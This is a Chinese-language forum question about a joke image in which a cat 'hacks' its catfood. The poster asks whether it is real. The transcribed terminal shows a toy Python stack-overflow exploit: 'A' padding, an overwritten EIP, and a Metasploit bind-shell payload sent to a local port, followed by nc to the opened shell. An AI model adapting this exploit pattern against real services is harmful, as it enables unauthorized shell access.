我试图理解这张图片中的代码:
图片中的代码:
$ open catfood
catfood: Unable to open catfood
Permission denied
$ cat > canopener.py
#!/usr/bin/python
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 7500))
crash = '\x41'*1337
eip = '\xFF\xFE\xEF\x08'
payload = open("msf-bindshell-8888.bin").read()
sock.send(crash+eip+payload)
sock.close()
$ chmod +x canopener.py; ./canopener.py
$ nc -vv localhost 8888
localhost [127.0.0.1] 8888 (?) open
# open catfood
Opening delicious catfood...
我的理解是,这是一种使用 python 代码进行未经授权访问的黑客攻击,连接到本地主机并发送有效负载,但我的知识就止步于此。
这是一个真正的黑客还是一个我不明白的笑话?
相关分类